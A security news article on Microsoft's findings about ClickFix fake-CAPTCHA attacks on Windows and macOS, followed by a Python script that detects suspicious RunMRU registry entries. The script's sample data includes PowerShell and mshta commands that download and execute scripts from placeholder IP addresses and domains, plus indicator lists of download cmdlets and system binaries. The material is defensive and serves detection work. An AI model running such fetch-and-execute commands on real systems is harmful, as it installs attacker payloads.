Microsoft Warns of Hackers Using ClickFix Technique to Attack Windows and macOS Devices


Cybersecurity researchers have identified a sophisticated social engineering technique called ClickFix that has been rapidly gaining traction among threat actors since early 2024.

This deceptive attack method targets both Windows and macOS devices, tricking users into executing malicious commands through seemingly legitimate technical troubleshooting procedures.

The technique has been observed in campaigns affecting thousands of enterprise and consumer devices worldwide every day, representing a significant evolution in social engineering tactics.


The ClickFix technique operates by presenting users with fake error messages, CAPTCHA verifications, or human verification prompts that appear to require immediate action to resolve minor technical issues.

Figure: The typical ClickFix attack chain (Source – Microsoft)

These lures are typically delivered through phishing emails, malicious advertisements, or compromised websites that redirect victims to specially crafted landing pages.

The attack’s effectiveness lies in its exploitation of users’ natural tendency to solve apparent technical problems, making it particularly dangerous as it bypasses traditional automated security solutions through human interaction.

Microsoft analysts identified multiple threat actors leveraging ClickFix attacks to deliver a diverse array of malicious payloads, including the prolific Lumma Stealer infostealer, remote access tools such as Xworm and AsyncRAT, loaders like Latrodectus and MintsLoader, and sophisticated rootkits including a modified version of the open-source r77.

These payloads typically operate as “fileless” malware, loaded directly into memory by living-off-the-land binaries rather than being written to disk as traditional executable files.

The attack chain begins when victims encounter visual lures that mimic legitimate services such as Cloudflare Turnstile verification, Google reCAPTCHA, or even social media platforms like Discord.

When users interact with these fake verification systems, malicious JavaScript code executes in the background, copying obfuscated commands to the user’s clipboard using the navigator.clipboard.writeText() function.

Technical Implementation and Command Execution

The core of the ClickFix technique revolves around manipulating the Windows Run dialog box, accessed through the Windows key + R shortcut.

Threat actors have strategically chosen this approach because most users are unfamiliar with this Windows component and its potential security implications.

The malicious commands typically involve PowerShell cmdlets such as iwr (Invoke-WebRequest), irm (Invoke-RestMethod), and iex (Invoke-Expression) to download and execute payloads from remote servers.

Figure: Lampion infection chain (Source – Microsoft)

A notable case study involves the Lampion malware campaign first identified in May 2025, which targeted Portuguese organizations across government, finance, and transportation sectors.

The campaign utilized a sophisticated multi-stage infection process beginning with phishing emails containing ZIP files. These archives contained HTML files that, when opened, redirected users to a fake Portuguese tax authority website hosting the ClickFix lure.

The subsequent PowerShell command downloaded an obfuscated VBScript that created additional scripts in the Windows %TEMP% directory and established persistence through scheduled tasks.

The technique’s adaptability extends beyond Windows environments, with recent campaigns observed targeting macOS users to deliver Atomic macOS Stealer (AMOS).

These attacks demonstrate the technique’s cross-platform capabilities, utilizing similar social engineering tactics while adapting the underlying commands for macOS terminal execution.

The macOS variant employed sophisticated password theft mechanisms, continuously prompting users for system passwords and utilizing the stolen credentials to bypass macOS security features through xattr -c commands.

Detection of ClickFix attacks relies on monitoring the RunMRU registry key, which keeps a history of the commands entered into the Run dialog.

Security teams can identify suspicious activity by examining entries containing living-off-the-land binaries, direct IP addresses, content delivery network domains, or files with suspicious extensions.

Microsoft’s research reveals that threat actors frequently employ obfuscation techniques including Base64 encoding, string concatenation, and escaped characters to evade detection systems.
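The following is an added example, not code from the article or from Microsoft, showing how the RunMRU review described above can be automated. It takes the values of HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU (constructed sample data is embedded; on a live host the same values can be exported with reg query or PowerShell's Get-ItemProperty), undoes the three obfuscation tricks named in the text (Base64-encoded commands, string concatenation, backtick escapes) and then flags entries that start a living-off-the-land binary, call a download cmdlet, reference a bare IP address or CDN host, or fetch a file with a suspicious extension. The indicator lists, the .invalid domain names and the IP addresses are assumptions chosen for the example.

```python
import base64
import re

# Constructed sample of the RunMRU key (not from the article). Windows stores each
# Run-dialog command as a string value named a, b, c, ... with a literal trailing "\1",
# and the "MRUList" value records the most-recent-first order of those names.
_ENC_PAYLOAD = base64.b64encode(
    "irm 'https://cdn.example-lure.invalid/f.ps1' | iex".encode("utf-16le")
).decode("ascii")

SAMPLE_RUNMRU = {
    "MRUList": "edcba",
    "a": "notepad\\1",
    "b": "powershell -w hidden -c \"iex (iwr 'http://203.0.113.10/x.ps1' -UseBasicParsing)\"\\1",
    "c": "mshta https://cdn.example-lure.invalid/v.hta\\1",
    "d": "powershell -enc " + _ENC_PAYLOAD + "\\1",
    "e": "powershell -c ('i'+'ex') (i`wr 'http://198.51.100.7/a.txt')\\1",
}

# Indicator lists are assumptions and a starting point; tune them for your environment.
LOLBINS = {"powershell", "pwsh", "mshta", "cmd", "curl", "certutil", "rundll32",
           "regsvr32", "bitsadmin", "wscript", "cscript", "msiexec"}
DOWNLOAD_CMDLETS = ("iwr", "invoke-webrequest", "irm", "invoke-restmethod",
                    "iex", "invoke-expression", "downloadstring")
SUSPICIOUS_EXT = (".hta", ".ps1", ".vbs", ".js", ".bat", ".cmd", ".dll", ".exe")
CDN_HINTS = ("cdn.", "cloudfront.net", "githubusercontent.com")

ENC_RE = re.compile(r"-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
CONCAT_RE = re.compile(r"""(['"])([^'"]*)\1\s*\+\s*(['"])([^'"]*)\3""")
IP_URL_RE = re.compile(r"https?://(?:\d{1,3}\.){3}\d{1,3}")


def decode_encoded_command(cmd: str) -> str:
    """Replace a PowerShell -EncodedCommand argument (Base64 of UTF-16LE) with its plaintext."""
    m = ENC_RE.search(cmd)
    if not m:
        return cmd
    try:
        decoded = base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return cmd  # not valid Base64/UTF-16: leave the entry untouched for analysts
    return cmd[: m.start()] + decoded + cmd[m.end():]


def normalize(raw: str) -> str:
    """Strip the RunMRU "\\1" suffix and undo common obfuscation so indicators become visible."""
    cmd = raw.removesuffix("\\1")
    cmd = decode_encoded_command(cmd)
    cmd = cmd.replace("`", "")  # backtick escapes: i`wr -> iwr
    while True:  # collapse 'i'+'ex' -> 'iex' until nothing changes
        collapsed = CONCAT_RE.sub(lambda m: f"'{m.group(2)}{m.group(4)}'", cmd)
        if collapsed == cmd:
            break
        cmd = collapsed
    return cmd.replace("'", "").replace('"', "").lower()


def analyze_entry(name: str, raw: str) -> dict:
    """Return the indicators found in one RunMRU value."""
    norm = normalize(raw)
    reasons = []
    words = norm.split()
    binary = words[0].replace("\\", "/").rsplit("/", 1)[-1].removesuffix(".exe") if words else ""
    if binary in LOLBINS:
        reasons.append(f"lolbin:{binary}")
    for cmdlet in DOWNLOAD_CMDLETS:
        if re.search(rf"\b{re.escape(cmdlet)}\b", norm):
            reasons.append(f"download-cmdlet:{cmdlet}")
    if IP_URL_RE.search(norm):
        reasons.append("direct-ip-url")
    if any(hint in norm for hint in CDN_HINTS):
        reasons.append("cdn-domain")
    for ext in SUSPICIOUS_EXT:
        if re.search(rf"\S{re.escape(ext)}\b", norm):
            reasons.append(f"suspicious-ext:{ext}")
    if ENC_RE.search(raw):
        reasons.append("obfuscation:base64")
    if "`" in raw:
        reasons.append("obfuscation:backtick")
    if CONCAT_RE.search(raw):
        reasons.append("obfuscation:concat")
    return {"name": name, "raw": raw, "normalized": norm,
            "reasons": reasons, "suspicious": bool(reasons)}


def analyze_runmru(values: dict) -> list:
    """Analyze every entry in MRUList order (most recent first)."""
    order = values.get("MRUList", "")
    return [analyze_entry(n, values[n]) for n in order if n in values]


if __name__ == "__main__":
    for r in analyze_runmru(SAMPLE_RUNMRU):
        print(f"{r['name']}: {'SUSPICIOUS' if r['suspicious'] else 'ok':10} {r['normalized']}")
        for reason in r["reasons"]:
            print(f"      - {reason}")
```

Normalizing before matching is the important design choice: a rule that looks for the literal string iex in the raw value misses both the Base64 form (entry d) and the concatenated form (entry e), while the decoded and collapsed text exposes the same iwr/irm/iex pattern in all three malicious PowerShell entries. The decoder deliberately leaves undecodable input alone rather than dropping it, so a malformed entry still reaches the analyst.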




About Cybernoz

Security researcher and threat analyst with expertise in malware analysis and incident response.